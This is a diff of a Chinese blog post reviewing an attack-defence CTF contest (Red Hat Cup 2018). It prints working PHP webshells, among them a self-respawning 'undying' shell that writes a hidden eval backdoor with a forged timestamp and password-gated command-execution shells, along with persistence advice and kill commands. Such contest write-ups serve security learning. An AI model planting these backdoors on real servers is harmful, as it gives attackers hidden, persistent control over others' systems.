--- a/_posts/2018-06-01-第二届红帽杯填坑笔记.md
+++ b/_posts/2018-06-01-第二届红帽杯填坑笔记.md
@@ -1,24 +1,25 @@
 ---
 layout: post
 title: "第二届“红帽杯”网络安全大赛填坑笔记"
-date: 2018-6-1
-description: "第二届红帽杯安全大赛"
+date: 2018-06-01
+description: "CTF"
 tag: AWD
----
+
 ---
 
 **填坑，填坑，填坑。。。**<br>
-（PS：文章还是写的那么烂...）
+
+文章还是写的那么烂...
 
 ---
 
 ### 前言：
 
-时间过的很快啊，又是一年红帽，，<br/>
+时间过的很快啊，又是一年红帽，<br/>
 
-相遇的时间很短暂，相约的时间却很长，，<br/>
+相遇的时间很短暂，相约的时间却很长，<br/>
 
-明年，你是否还会再来，，，<br/>
+明年，你是否还会再来。<br/>
 
 ---
 
@@ -33,43 +34,66 @@ tag: AWD
 ---
 
 
-### 特别说明
+### 特别说明：
 
-1. 本次实验还原所用的环境为：Centos7+lnmp+web2
+本次实验还原所用的环境为：Centos7+lnmp+web2
 
-2. 以下截图中IP可能不同，原因：家+公司，，但是不影响结果
+------
+
+### 目录：
+
+* <a href="#a1" target="_self">1. 进攻篇（web）</a>
+* <a href="#a2" target="_self">2. 防御篇</a>
+* <a href="#a3" target="_self">3. 关于不死马</a>
+* <a href="#a4" target="_self">4. 关于md5校验马</a>
+* <a href="#a5" target="_self">5. 一些技巧</a>
+* <a href="#a6" target="_self">扩展一：关于所有者权限（WWW）</a>
+* <a href="#a7" target="_self">扩展二：线下赛常见的上传getshell方式</a>
+* <a href="#a8" target="_self">扩展三：screen命令</a>
+* <a href="#a9" target="_self">扩展四：菜刀流量加密方式</a>
+* <a href="#zj" target="_self">总结</a>
+* <a href="#js" target="_self">结束语</a>
 
 ------
 
 
-### NO.1 进攻篇（web）
+### <span id = "a1">NO.1 进攻篇（web）</span>
 
 在调试机器之前发现有后台，<br>
 
-根据以往的经验，我先把自己后台密码（弱口令 admin/admin）改了，以免被别人getshell （PS：很多比赛后台都是弱口令）<br>
+根据以往的经验，我先把自己后台密码（弱口令 admin/admin）改了，以免被别人getshell <br>
+
+**PS：很多比赛后台都是弱口令**<br>
 
 然后开始改其他队伍后台密码，改了十几二十多左右吧，后面发现并没有什么用，<br>
 
-![images](/images/2018-6-1/hm03.png)
+![images](/images/2018-06-01/hm03.png)
+
 ---
 
 会员头像上传，后台管理界面上传shell都试了，一直显示目录权限不足，然后放弃了，估计是主办方挖的坑吧！！！<br>
 
-（PS：finecms5.2.0版本的貌似没有上传漏洞，5.0.9版本的有一个，可以参考一下这篇文章）
+**PS：finecms5.2.0版本的貌似没有上传漏洞，5.0.9版本的有一个，可以参考一下这篇文章** <br>
 ```
 https://blubiu.github.io/2017/10/2017强网杯线下AWD总结/
 ```
 
-![images](/images/2018-6-1/hm04.png)
----
-![images](/images/2018-6-1/hm05.png)
----
-PS：这里的话在比赛的时候是不可以连外网的，最好准备一些编码解码工具，Google浏览器也可以进行部分编码的解码
-
-![images](/images/2018-6-1/hm06.png)
 ---
 
---------------------------
+![images](/images/2018-06-01/hm04.png)
+
+---
+
+![images](/images/2018-06-01/hm05.png)
+
+---
+
+**PS：这里的话在比赛的时候是不可以连外网的，最好准备一些编码解码工具，Google浏览器也可以进行部分编码的解码**
+
+![images](/images/2018-06-01/hm06.png)
+
+---
+
 
 然后比赛前5分钟就开始打了，被打的有点懵逼，<br/>
 
@@ -81,93 +105,96 @@ PS：这里的话在比赛的时候是不可以连外网的，最好准备一些
 
 上的waf抓到了传说中的神仙流量，但是只记录了GET，POST请求，请求路径都没有，然后也没看出个所以然来，<br>
 
+![images](/images/2018-06-01/hm01.png)
 
-![images](/images/2018-6-1/hm01.png)
 ---
 
 其实记录流量的脚本也有上，但是可能配置有点错误，没有运行起来，<br>
 
 比赛后跟其他队交流，也知道了一些漏洞，大多都是命令执行，<br>
 
-不过web1也有一个后台getshell，账号上是yunyunyun，密码admin（nginx日志上可以看到POST请求）
+不过**web1**也有一个后台getshell，账号上是**yunyunyun**，密码**admin**（nginx日志上可以看到POST请求）
 
-（PS：这里主要还是以web2为主）
+**PS：这里主要还是以web2为主** <br>
 
-目前代码还很弱，本菜无法分析一些漏洞，下面附上一个表哥漏洞分析文章
-
+目前代码还很弱，本菜无法分析一些漏洞，下面附上一个表哥漏洞分析文章 <br>
 ```
 http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 ```
 
-进攻只能宣告GG了。。
+进攻篇就先只能这样了，太菜了 （逃。。
 
 
 -------------
 
 
+### <span id = "a2">NO.2 防御篇</span>
 
-### NO.2 防御篇
-（PS：还是以web方向为主，pwn一脸懵逼！！！）
+**PS：还是以web方向为主，pwn一脸懵逼！！！**
 
-感觉程序还是要走的（/手动捂脸）<br/>
+感觉程序还是要走的（手动捂脸）<br/>
 
 上来先改后台密码，改ssh密码等，<br>
 
 然后把源码down下来备份，方便审计，也防止down机（down机扣双倍分数），<br>
 
 再用D盾扫一圈源码，<br>
-（PS：这次比赛刚down下源码就发现很多后门，都变跑马场了，dalao进攻速度也太快了）<br>
 
+**PS：这次比赛刚down下源码就发现很多后门，都变跑马场了，dalao进攻速度也太快了**<br>
 
-![images](/images/2018-6-1/hm02.png)
-（跑马场）
+![images](/images/2018-06-01/hm02.png)
+
 ---
 
-如有后门，上去服务器清除，（PS：后门保留，分析，可以用来进攻，因为大家环境都是一样的，然后再着重防守有后门的目录）<br>
+如有后门，上去服务器清除，<br>
 
-这个CMS有注册界面可以进行账号注册，为避免对手利用建议关闭（第一届强网杯的时候就可以利用会员头像上传getshell）
+**PS：后门保留，分析，可以用来进攻，因为大家环境都是一样的，然后再着重防守有后门的目录**<br>
 
-![images](/images/2018-6-1/hm10.png)
+这个CMS有注册界面可以进行账号注册，为避免对手利用建议关闭（第一届强网杯的时候就可以利用会员头像上传getshell） <br>
 
-![images](/images/2018-6-1/hm11.png)
+![images](/images/2018-06-01/hm10.png)
+
+![images](/images/2018-06-01/hm11.png)
+
 ---
 
-关于上面老哥博客发现的一些漏洞<br>
+关于上面老哥博客发现的一些漏洞 <br>
 
-可以使用vi编辑命令去修改代码<br>
+可以使用**vi编辑**命令去修改代码 <br>
 
-或者注释掉有漏洞的代码<br>
+或者注释掉有漏洞的代码 <br>
 
-在不down机的情况下可以删除页面<br>
+在不down机的情况下可以删除页面 <br>
 
-**更新：**<br>
+**补充：**<br>
+
 可以直接删除有漏洞的那一段代码，<br>
 
-或者xftp上去修改
+或者**xftp**上去修改
 
 -----------------
 
 关于比赛中waf的使用<br>
 
-可以在公共配置文件里面包含，比如config.php，system.php等<br>
+可以在公共配置文件里面包含，比如**config.php** ，**system.php**等<br>
 
-因为访问网页的时候首先读取的是公共配置文件，<br>
+因为访问网页的时候首先经过的是公共配置文件，<br>
 
 有些漏洞不一定要通过主页，但是不管访问那个页面，都需要经过公共配置文件
 
------------------
+------------
 
 
 
-### NO.3 关于不死马
+### <span id = "a3">NO.3 关于不死马</span>
 
-本次比赛被不死马打的防不胜防，，<br>
+本次比赛被不死马打的防不胜防，<br>
 
-填坑继续。。<br>
+填坑继续...<br>
 
-本次模拟从不死马攻击到解决不死马<br>
+本次模拟从不死马攻击到解决不死马 <br>
 
-先扔一只马。。。
+先扔一只马。。。<br>
 
 ````php
 <?php
@@ -185,71 +212,80 @@ http://skysec.top/2018/05/27/2018RedHat-AD-Web/
         file_put_contents('/home/wwwroot/default/templates/.xiao2.php','<?php @eval($_POST[xiao2]);?>');
         //在xxx目录写入一个名字为.xiao2.php的隐藏文件，内容为<?php @eval($_POST[xiao2]);?>
         system('chmod 777 .xiao2.php');
-	//附加777权限
+		//附加777权限
         touch("/home/wwwroot/default/templates/.xiao2.php", mktime(20,15,1,11,17,2017));
         usleep(100);
-	//每隔一秒运行一次
+		//每隔一秒运行一次
     }
 
 ?>
 ````
 
-Web2目录结构<br>
+Web2目录结构 <br>
 
-![images](/images/2018-6-1/hm21.png)
+![images](/images/2018-06-01/hm21.png)
+
 ---
 
-随便一个能正常浏览的目录都可以，ssh登录后用xftp扔一只马(xiao.php)上去，然后自己用菜刀连接，，<br>
+随便一个能正常浏览的目录都可以，**ssh登录**后用**xftp**扔一只马(xiao.php) <br>
 
-（PS：扔马的好处是，维持自己的权限，在网站奔溃之后还可以进行操作，user不能操作的，马子可以补上这个缺口）<br>
+然后用菜刀连接，<br>
 
-然后通过菜刀上传不死马（no_die_shell.php）
+**PS：扔马的好处是，维持自己的权限，在网站奔溃之后还可以进行操作，user不能操作的，马子可以补上这个缺口** <br>
 
-![images](/images/2018-6-1/hm12.png)
+然后通过菜刀上传不死马（no_die_shell.php）<br>
+
+![images](/images/2018-06-01/hm12.png)
+
 ---
 
 可以看到不死马权限为www(所有者)，，<br>
-（PS：比赛中为www-data，，实际是一样的，，原谅本菜不能100%还原比赛环境）
 
-![images](/images/2018-6-1/hm13.png)
+**PS：比赛中为www-data，，实际是一样的，，原谅本菜不能100%还原比赛环境**
+
+![images](/images/2018-06-01/hm13.png)
+
 ---
 
-然后直接访问激活不死马<br>
+然后直接访问激活不死马 <br>
 
-![images](/images/2018-6-1/hm14.png)
+![images](/images/2018-06-01/hm14.png)
+
 ---
 
-可以看到生成了一个.xiao2.php的隐藏一句话后门
+可以看到生成了一个.xiao2.php的隐藏一句话后门 <br>
 
-![images](/images/2018-6-1/hm15.png)
-![images](/images/2018-6-1/hm16.png)
+![images](/images/2018-06-01/hm15.png) <br>
 
-------------------------
+![images](/images/2018-06-01/hm16.png)
 
-尝试删除一：<br>
+-------------
+
+**尝试删除一：**<br>
+
 直接**rm -rf**<br>
-宣告GG
 
-![images](/images/2018-6-1/hm17.png)
+删除失败 <br>
+
+![images](/images/2018-06-01/hm17.png)
+
 ---
 
------
+**尝试删除二：**<br>
 
+**重启nginx** <br>
 
-尝试删除二：<br>
+也失败，没权限 <br>
 
-重启nginx<br>
+**PS：比赛中为apache2，因为本菜还原所用的环境不同，比赛中如果是Apache的就把命令中nginx换成apache2就好了** <br>
 
-也GG，没权限<br>
-（PS：比赛中为apache2，因为本菜还原所用的环境不同，比赛中如果是Apache的就把命令中nginx换成apache2就好了）
+![images](/images/2018-06-01/hm19.png)
 
-![images](/images/2018-6-1/hm19.png)
 ---
 
------
+**删除三：** <br>
 
-
-删除三：赛后跟其他师傅讨论，可以用www权限去关闭Apache（从根本上阻断shell的生成），然后就可以删除不死马了<br>
+赛后跟其他师傅讨论，可以用www权限去关闭Apache（从根本上阻断shell的生成），然后就可以删除不死马了<br>
 
 那，试试呗！！！<br>
 
@@ -257,32 +293,38 @@ Web2目录结构<br>
 
 可以看到nginx虽然是root启动的，但是部分子进程为www权限<br>
 
-可以关闭
+可以关闭 <br>
 
-![images](/images/2018-6-1/hm18.png)
+![images](/images/2018-06-01/hm18.png)
+
 ---
 
-使用命令关闭，，（root那个权限运行的关不掉）
-```
+使用命令关闭（root权限运行程序是关不掉） <br>
+```bash
 killall -HUP nginx
 ```
-或者
-```
+
+或者：<br>
+```bash
 killall nginx
 ```
-拜拜了。。
 
-![images](/images/2018-6-1/hm20.png)
+然后就拜拜了。。
 
-（PS:这里说明一下，杀死进程如果想再开启需要重启服务，线下普通用户是没有权限重启的，要重启只能让主办方重启了，不过要扣分）<br>
+![images](/images/2018-06-01/hm20.png)
+
+------
+
+**PS:这里说明一下，杀死进程如果想再开启需要重启服务，线下普通用户是没有权限重启的，要重启只能让主办方重启了，不过要扣分**<br>
 
 
-**更新**<br>
-有表哥说使用 grep -i php 命令杀掉也可以删除不死马，<br>
+**补充：**<br>
+
+有表哥说使用 **grep -i php** 命令杀掉也可以删除不死马，<br>
 
 具体本菜也没试过，后面可以看看
 
--------------------------------------------
+----------
 
 除了杀死服务删除不死马之外，，还有一种方法<br>
 
@@ -290,14 +332,14 @@ killall nginx
 
 也可以达到防御效果<br>
 
-杀死服务可能会导致down机，这样就没有这种烦恼了
+杀死服务可能会导致down机，这样就没有这种烦恼了 <br>
 
-（PS:这种方式灭不死马最好不过了，上面杀死进程方法可能会导致服务器down机）
+PS:这种方式灭不死马最好不过了，上面杀死进程方法可能会导致服务器down机
 
----------------
+-----------
 
 
-### NO.4 关于md5校验马
+### <span id = "a4">NO.4 关于md5校验马</span>
 
 继续填坑。。<br>
 
@@ -307,7 +349,7 @@ killall nginx
 
 相比之前的普通一句话，这种更难被发现，更难查杀。。<br>
 
-放马
+放马 <br>
 
 ```php
 <?php error_reporting(0);
@@ -318,63 +360,71 @@ if (md5($_POST['pw'])==='21232f297a57a5a743894a0e4a801fc3')
 	} 
 ?>
 ```
-这种马设置了两个参数<br>
 
-首先判断pw的值是否为admin<br>
+这种马设置了两个参数 <br>
 
-正确的话就传cmd参数进去<br>
+首先判断pw的值是否为admin <br>
 
-当两个参数都正确时才能生效<br>
+正确的话就传cmd参数进去 <br>
+
+当两个参数都正确时才能生效 <br>
 
 这种马不仅可以当一句话使用，还可以执行命令。。<br>
 
 ----
 
-溜一只名字为rood.php的马
+溜一只名字为rood.php的马 <br>
 
-![images](/images/2018-6-1/hm22.png)
+![images](/images/2018-06-01/hm22.png)
+
 ---
 
 首先演示命令执行，读取phpinfo，走你！<br>
 
-![images](/images/2018-6-1/hm23.png)
-（PS：这里需要POST提交）
+**PS：这里需要POST提交**
+
+![images](/images/2018-06-01/hm23.png) <br>
+
 ---
 
-命令执行whoami
+命令执行whoami <br>
 
-![images](/images/2018-6-1/hm24.png)
+![images](/images/2018-06-01/hm24.png)
+
 ---
 
 **get flag**
 
-![images](/images/2018-6-1/hm25.png)
+![images](/images/2018-06-01/hm25.png)
 
-------------------------------------------
+--------------
 
 菜刀连接方式：<br>
 
 **方法一：**<br>
 
-在配置里面把密码传进去，，密码输入里面把cmd参数传进去
+在配置里面把密码传进去，，密码输入里面把cmd参数传进去 <br>
 
-![images](/images/2018-6-1/hm26.png)
+![images](/images/2018-06-01/hm26.png)
+
 ---
 
 **方法二：**<br>
 
-直接在密码输入里面把两种参数一起传进去
+直接在密码输入里面把两种参数一起传进去 <br>
 
-![images](/images/2018-6-1/hm27.png)
+![images](/images/2018-06-01/hm27.png)
+
 ---
 
-两种方法都可以连进去
+两种方法都可以连进去 <br>
 
-![images](/images/2018-6-1/hm28.png)
+![images](/images/2018-06-01/hm28.png)
 
-------------------------------------------------
+-----------
 
-**再溜一只马**
+**再溜一只马** <br>
+
 ```php
 <?php error_reporting(0); 
 if(md5($_POST[a])==='21232f297a57a5a743894a0e4a801fc3') 
@@ -382,6 +432,7 @@ if(md5($_POST[a])==='21232f297a57a5a743894a0e4a801fc3')
 	@eval($_POST[b]);}
 ?>
 ```
+
 这只马跟之前的有点不太一样，多了一句读取flag<br>
 
 有点小蛇皮，，<br>
@@ -392,11 +443,12 @@ if(md5($_POST[a])==='21232f297a57a5a743894a0e4a801fc3')
 
 这种马就是为了防止这种情况<br>
 
-走你
+走你 <br>
 
-扔一只名字为rood3.php的马上去
+扔一只名字为rood3.php的马上去 <br>
 
-![images](/images/2018-6-1/hm36.png)
+![images](/images/2018-06-01/hm36.png)
+
 ---
 
 即使不用b参数执行命令也可以读flag，<br>
@@ -408,27 +460,29 @@ if(md5($_POST[a])==='21232f297a57a5a743894a0e4a801fc3')
 -----------
 
 
-### NO.5 比赛中的一些技巧
+### <span id = "a5">NO.5 一些技巧</span>
 
-<h2>一：利用对手payload反打</h2>
+1. 利用对手payload反打
 
-（PS：这个方法是跟一个朋友赛后一起讨论才知道的，很蛇皮）
+PS：这个方法是跟一个朋友赛后一起讨论才知道的，很蛇皮
 
 一上来就被种了这么多马，，泪奔<br>
 
-![images](/images/2018-6-1/hm29.png)
+![images](/images/2018-06-01/hm29.png)
+
 ---
 
 在缺乏进攻手段时，除了防御之外，利用对手流量打回去最好不过了，，<br>
 
 这里假设对手的木马为rood2.php<br>
 
-![images](/images/2018-6-1/hm30.png)
+![images](/images/2018-06-01/hm30.png)
+
 ---
 
 那么可以利用他，抓他的流量来查看攻击payload<br>
 
-先附上抓流量的脚本
+先附上抓流量的脚本 <br>
 
 ```php
 <?php
@@ -492,7 +546,8 @@ log_log();
 
 还能看到他访问的一个URL
 
-![images](/images/2018-6-1/hm31.png)
+![images](/images/2018-06-01/hm31.png)
+
 ---
 
 在比赛中，不只有木马可以利用，，如果有发现其他页面存在漏洞，一样可以用这个方式去抓payload<br>
@@ -501,19 +556,20 @@ log_log();
 
 解码菜刀流量后，发现并没有密码什么的，
 
-![images](/images/2018-6-1/hm32.png)
+![images](/images/2018-06-01/hm32.png)
+
 ---
 
 听dalao说可能是因为，菜刀连接会发送两个或以上的包，流量没有抓完整，所以没有抓到重要部分<br>
 
 看来这个流量脚本还需要改进<br>
 
-（PS：一般大佬都是使用脚本批量去跑flag，不会使用菜刀一个一个手动去看）
+PS：一般大佬都是使用脚本批量去跑flag，不会使用菜刀一个一个手动去看
 
 ------
 
 
-<h2>二：纯HTML过check机制</h2>
+2. 纯HTML过check机制
 
 每场比赛主办方都会用某种方式去判断选手的机器是否存活<br>
 
@@ -528,7 +584,8 @@ log_log();
 nmap -v -n -T5 -A -O -oX F:\\PentestBox\\bishai.xml 172.16.5.0/24
 ```
 
-![images](/images/2018-6-1/hm33.png)
+![images](/images/2018-06-01/hm33.png)
+
 ---
 
 可以做进攻准备吧，探测一下信息<br>
@@ -543,12 +600,13 @@ apache，nginx等日志，或者自己有抓到流量也行<br>
 
 然后就可以根据他chack了那些页面去调整了<br>
 
-下面是那位老哥博客截图
+下面是那位老哥博客截图 <br>
 
-![images](/images/2018-6-1/hm34.png)
+![images](/images/2018-06-01/hm34.png)
+
 ---
 
-博客地址：
+博客地址：<br>
 ```
 http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 ```
@@ -571,11 +629,7 @@ http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 
 -----------
 
-
-<h2>一些扩展:</h2>
-
-
-### 扩展一：所有者权限（WWW）
+### <span id = "a6">扩展一：关于所有者权限（WWW）</span>
 
 一般为文件的创建者，谁创建了该文件，就成为该文件的所有者<br>
 
@@ -583,7 +637,7 @@ http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 ----------
 
 
-### 扩展二：线下赛常见的上传getshell
+### <span id = "a7">扩展二：线下赛常见的上传getshell方式</span>
 
 除了一下写文件漏洞外<br>
 
@@ -591,23 +645,24 @@ http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 
 随便选一个文章修改
 
-![images](/images/2018-6-1/hm07.png)
+![images](/images/2018-06-01/hm07.png)
+
 ---
 
 然后先查看编辑器版本（PS：这里的话这个版本的编辑器目前没有爆出上传漏洞，除非有0day,不过1.3.6版本的有上传截断漏洞）
 
-![images](/images/2018-6-1/hm08.png)
+![images](/images/2018-06-01/hm08.png)
+
 ---
 
 如果有上传漏洞，那么一般在图片上传处抓包绕过上传等
 
-![images](/images/2018-6-1/hm09.png)
+![images](/images/2018-06-01/hm09.png)
+
 ---
 
----------------
 
-
-### 扩展三：screen命令
+### <span id = "a8">扩展三：screen命令</span>
 
 在比赛中可能会使用到多个脚本，<br>
 
@@ -615,28 +670,30 @@ http://skysec.top/2018/05/27/2018RedHat-AD-Web/
 
 命令行界面没有图形化界面开多个终端那么方便<br>
 
-这个时候可以使用screen命令进行操作
+这个时候可以使用screen命令进行操作 <br>
 
-可以参考这篇文章
+可以参考这篇文章 <br>
 ```
 http://man.linuxde.net/screen
 ```
-直接输入screen命令，他会进入到一个新的窗口
 
-![images](/images/2018-6-1/hm35.png)
+直接输入screen命令，他会进入到一个新的窗口 <br>
+
+![images](/images/2018-06-01/hm35.png)
+
 ---
 
-然后就可以运行脚本了，比如python 123.py
+然后就可以运行脚本了，比如python 123.py <br>
 
 如果想运行第二个脚本，可以按Ctrl +a +d 退回终端，不会影响123.py脚本的运行，<br>
 
 然后再起一个screen就可以了
 
-（PS：Linux系统默认是没有安装screen的，需要自己手动去安装，线下没网情况可以自带安装包过去）
+PS：Linux系统默认是没有安装screen的，需要自己手动去安装，线下没网情况可以自带安装包过去
 
 -----------
 
-### 扩展四：菜刀流量加密方式
+### <span id = "a9">扩展四：菜刀流量加密方式</span>
 
 PHP：base64<br>
 
@@ -646,47 +703,48 @@ jsp：无加密，jsp所有内容都写小马里了<br>
 
 ----------
 
-### 总结
 
-1. 稳住，我们能赢！！！（PS：前期被打很容易慌）
+### <span id = "zj">总结</span>
 
-2. 前期分好工，后续不必太僵硬，攻守可以互换
+前期分好工，后续不必太僵硬，攻守可以互换 <br>
 
-3. 脚本工具分类准备好
+脚本工具分类准备好 <br>
 
-4. 权限维持很重要，能使用不死马，md5校验马就不要使用普通一句话（PS：密码不要太简单，容易被破解）
+权限维持很重要，能使用不死马，md5校验马就不要使用普通一句话（PS：密码不要太简单，容易被破解）<br>
 
-5. 可以多创建两三个ssh账号，方便队友进行操作（PS：两个人共用一个账号容易掉）
+可以多创建两三个ssh账号，方便队友进行操作（PS：两个人共用一个账号容易掉）<br>
 
-6. 拿到对方权限后，多在不同目录下放后门木马
+拿到对方权限后，多在不同目录下放后门木马 <br>
 
-7. 删除对手木马的同时尽量留一份，不管是后期分析，反打也好
+删除对手木马的同时尽量留一份，不管是后期分析，反打也好 <br>
 
-8. 进攻，防御，信息收集都很重要，比如：端口，开放那些服务，服务器版本等等
+进攻，防御，信息收集都很重要，比如：端口，开放那些服务，服务器版本等等 <br>
 
-9. 防御的时候能关的则关，会员注册，端口等等（PS：去年世安有通过端口进攻的）
+防御的时候能关的则关，会员注册，端口等等（PS：去年世安有通过端口进攻的）<br>
 ```
 https://blubiu.github.io/2018/05/Web安全--端口详解/
 ```
-10. 密码尽量都改，ssh，后台密码等
 
-12. 准备好编码解码工具，线下常见的编码有：Unicode，URL，base64等（PS：Google浏览器控制台可以解部分编码）
+密码尽量都改，ssh，后台密码等 <br>
 
-12. 流量日志很重要，多看，，本次比赛web1为nginx，web2为Apache
+准备好编码解码工具，线下常见的编码有：Unicode，URL，base64等（PS：Google浏览器控制台可以解部分编码）<br>
 
-13. 比赛过程更有意义
+流量日志很重要，多看，，本次比赛web1为nginx，web2为Apache <br>
+
+比赛过程更有意义
 
 ----------
 
 
-### 结束语
+### <span id = "js">结束语</span>
 
-好像不知道要说点什么了，，，莫名的伤感！<br>
+好像不知道要说点什么了，<br>
 
-也许，通关之后就要和NPC说拜拜了。。<br>
+也许，通关之后就要和NPC说拜拜了，<br>
 
-这里还得感谢一下各位dalao的耐心解答<br>
+这里还得感谢一下各位dalao的耐心解答，<br>
 
-下次见。。
+下次见。
+
 -------
 
